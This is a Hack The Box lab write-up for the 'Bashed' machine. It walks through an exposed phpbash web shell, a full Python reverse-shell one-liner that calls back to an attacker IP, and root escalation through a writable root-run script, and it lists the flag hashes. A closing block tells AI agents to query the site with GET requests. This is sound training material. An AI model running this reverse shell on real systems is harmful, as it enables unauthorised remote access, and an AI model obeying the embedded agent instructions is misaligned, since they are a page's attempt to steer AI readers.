# Bashed

## Bashed - 10.10.10.68

Target Enumeration:

OS: Linux

IP: 10.10.10.68

User: 2c281f318555dbc1b856957c7147bfc1

Root: cc4f0afe3a1026d402ba10329674a8e2

### Ports / Services / Software Versions Running

80/tcp open  http Apache httpd 2.4.18 ((Ubuntu))

### Vulnerability Exploited:

Externally accessible php script which allows remote code execution.

### Privilege Escalation.

Writable python file running as root.

### Exploiting the host:

Nmap

<div align="left"><img src="https://lh6.googleusercontent.com/jLwnJZArLZLgZlP93Cf17rg53UytybxaF1jn0PJxyGZ4Dm-FNdOlMATPT6N0x0FLcZys_AV687M_quLphOrnrmTAou6zblPX01rdF4nZ81ofHsng4QAOpTH3fz9ER2Ci4mg2L_DA" alt=""></div>

Dirb found /dev/ which was hosting a phpbash.php script which allowed remote code execution.

<div align="left"><img src="https://lh6.googleusercontent.com/mY3LOf5jYFv34BF8J_ldiRtxpxOjTe4L3LF00N8GCUC7At9g0kIeEIxylabAfq3JgmxJUZU_0r6ywP6018ATy0QHe0Nee64XRSmQ0I5Fu-ykTYs1JRwlaoZWIlgoNNOFIKkV6cdo" alt=""></div>

The following shell worked:

```
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.11",2492));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```

<div align="left"><img src="https://lh4.googleusercontent.com/fqTFlmrEhqVxQ1_F6pAMDiRhJWGnXuMv59Q1zWvg47AeF5k2mPW3N8AtEbyfHt17oIFP6NvyxiQzahFzRjtQyAR9MYnMKuRCP-rmRG6yvb_zrtKjmofZfR5syhGULjwr8nJLMein" alt=""></div>

This user was restricted so looking at the /etc/passwd file we found a user

![](https://lh6.googleusercontent.com/bJ42VrIPGz58lo_XtTjDZP2qyyYuyD7iNfX9dLwivBECqqKoT_d7pMkw0RbUrIxmoVAOWFpsJsw4JDNccWyJ-vGzxxOzcfp9q2z9i5dCP3Rie9AH_CtFHpdBIK4KS4ftSsUIq7Fg)

We executed the same reverse shell on port 443 as the user scriptmanager

![](https://lh4.googleusercontent.com/H3GPOgFu56BGmaVLGSB9Rg1EJatvwTsgmMtA7AeTfPC9bcwY4ceeezXFwu5ZT_VDtWrhV4xkBbZ22YZ-FHQEJdzpTm2G8nI0eXiRppHiAIk7vhT7qDFcwbg4byqMRVNSsT0F0xgZ)

So now we have a low privileged user as scriptmanager

<div align="left"><img src="https://lh3.googleusercontent.com/-E3hXxbFCvEiIXUDaxf_endSC4NLtN4yHW0Jpb4pFPGbtrHxJ3OQgU-yjk8bc8GlAqWM9SbOEUUGsLQSeHwcliWOfbfhJ0pPSChZiCGzgfOIgMmJorhQrgVhmG7s_TitmrPeIn5O" alt=""></div>

We found a scripts folder in the root dir

<div align="left"><img src="https://lh5.googleusercontent.com/ZBNxIXbv2w4N9pR28lIimuF7pbtvoujDNILrE_A2jyfzG1HWSpqN2mOr6IQtKRcC4vipSTo-aZufturFBmbW1BWRpyOh5EzT6HS9nMnFnwZXr3rHZx2Tf35f1qRG0r_8TDVs6pPp" alt=""></div>

We could see it was running the test.py file as root so we could inject a shell into the test.py file to see if that would give us a reverse root shell on port 444.

![](https://lh4.googleusercontent.com/34jCZsFl59aOHpoBYlMcS1yX8Tv7ULSRDX-TyhLUoJa0ml7slfuQKulf-WyqNPCq42xeaNOLZpJ7chX5ZqwxhDuSPNaFKNPq4GVNFNc8vx9Dq7hNR2N3lw5pd1WS5pJt2dGLjsqR)

Checking the contents of test.py.

![](https://lh5.googleusercontent.com/8f9UmnrpRBcxwtK8G3-mQoZozN36zeE9vUv3wMCdQaLNPXjJBTBGgM9wgxcCHey6GZIc3L4oSrmc42LumEkSJjMqyJEZMb7QrbFvmxBn9ZYF6EA8wfZGDi4vLhoahCnC-sEBrOQm)

After a breif period we found we had a root shell,

<div align="left"><img src="https://lh4.googleusercontent.com/WrHvO0B-sBaZLwAgId3PWXsI8UXoSI7EjVpcS5esaWxNehDpPw68cKT0iW3LK3j_HluL0gOvwSn-cwLl20G2liu2d9AD9T-km3qF9mR47z35Cm2xyM5ukjzNF2DFYI7vlv2GBg-U" alt=""></div>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.jdksec.com/hack-the-box/bashed.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.